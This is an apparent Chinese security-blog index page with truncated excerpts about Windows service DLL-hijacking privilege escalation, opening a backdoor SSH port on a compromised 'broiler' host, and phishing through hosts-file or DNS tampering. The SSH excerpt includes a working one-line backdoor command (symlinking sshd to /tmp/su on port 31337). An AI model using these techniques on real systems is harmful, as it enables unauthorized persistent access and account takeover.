通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,比如我们替换掉服务所依赖的DLL文件,当服务重启时,加载我们替换的DLL文件从而完成比如添加管理员账号的...

Continue reading

渗透过程中的SSH

in 渗透案例,奇技淫巧 read (1386)

1.入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口,然后连接31337,用root/bin/ft...

Continue reading

0x00常见网络钓鱼方式 攻击者进行网络钓鱼的方式常有以下几种: 1、通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现; 2、通过修改受害者dns来实现; 3、已经进入路由器,直接修改路由器的DNS。 罗...

Continue reading

Evi1cg

The way to be safe is never to be secure !